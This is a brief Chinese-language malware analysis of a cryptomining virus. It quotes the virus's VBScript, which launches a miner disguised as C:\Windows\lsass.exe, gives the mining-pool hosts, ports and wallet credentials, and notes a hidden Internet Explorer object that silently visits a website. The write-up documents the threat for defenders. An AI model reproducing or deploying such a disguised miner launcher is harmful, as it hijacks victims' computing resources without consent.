比特币查询:

https://blockchain.info/
https://btc.com/
比特币_第1张图片

矿池通信:
将在TCP端口45560上与xmr.pool.minergate.com通信

WS.Run"C:\Windows\lsass.exe "&Lsass(Num)&"",0,False
执行lsass程序进行刷bit币,后面的登录账号有两个选择,每次随即抽取。

Lsass(1)="--url http://51wakuang.net:9332--user 1ByRGxLJHempFNi7JyTspXG3oFyrp7GHFH --pass P@ssw0rd --auto-fan--auto-gpu"
Lsass(2)="--scrypt --urlhttp://51wakuang.net:9327 --user LQYU5RGhvCVUBePSfAfAcsLkt5XSi1EgBQ --pass P@ssw0rd --auto-fan --auto-gpu"
同样,病毒创建了一个IE对象,后台默默访问wxw.51yingshi.net。浏览器设置为隐藏。
比特币_第2张图片

参考链接:hxxp://www[.]4hou.com/web/8118.html                 
                  hxxp://p.t.qq.com/longweibo/index.php?id=267371020317184